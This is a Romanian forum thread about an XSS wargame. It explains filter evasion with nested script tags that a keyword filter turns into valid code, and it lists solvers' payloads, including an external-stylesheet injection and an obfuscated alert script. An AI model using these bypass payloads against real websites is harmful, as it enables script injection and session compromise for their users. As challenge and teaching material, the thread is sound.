Va propun un wargame mai ciudat. Nu cred ca a mai fost unul la fel pe acest forum (si nici pe multe altele :) ).


Scopul e sa reusiti sa injectati JAVASCRIPT (nu am filtrat caracterul > si astfel putti injecta aproape orice alt cod in afara de javascript).

Dificultatea este minima.

Bafta & astept Print-Screen-uri :).

in loc sa faci blind xss attack, adica incerci chestii prestabilite in genul


incerci chestii si incerci sa te adaptezi, sa folosesti sistemul de filtrare in avantajul tau.

de exemplu pe un site se filtra <script> si </script> si atunci cand am observat am incercat:

<scr<script>ipt >alert(1)</scr</script>ipt> - care evident este gresit. dar pentru ca ei filtreaza anumite cuvinte transforma acest string intr-unul valid :)

dude, tu ai facut super tutorial de hacking si de mentalitate.. sincer chiar l-am citit cu placere.

putem sa nu ne mai certam te rog ?

chiar vreau sa intru cu placere in continuare pe forumul acesta.

Si eu la fel :). Considera-ne impacati (desi eu nu am considerat nicio clipa ce ne-am certat, ci doar ca am avut o diferenta in modul de a gandi).

@amprenta: trebuia sa ii lasi si pe ceilalti sa incerce :P.

Cred ca toti cei care ati vrut sa il faceti, ati avut destul timp la dispozitie :P. Acum, o sa sterg challenge-ul, pentru ca un XSS poate face multe :).

Metode prin care puteati rezolva challenge-ul, era sa introduceti in input:

  • From SharinGod : <LINK REL=stylesheet HREF=http://ha.ckers.org/xss.css>
    From phreak: <script<script> alert(2) </script</script>
    From me: tw8<script<script>var i; i =/t/;i=i+/w8/;i=i.substring(1,2) + i.substring(4,6);alert(i);</script</script>

Restul au fost, probabil, variatiuni pe aceeasi tema.

Bafta :P!

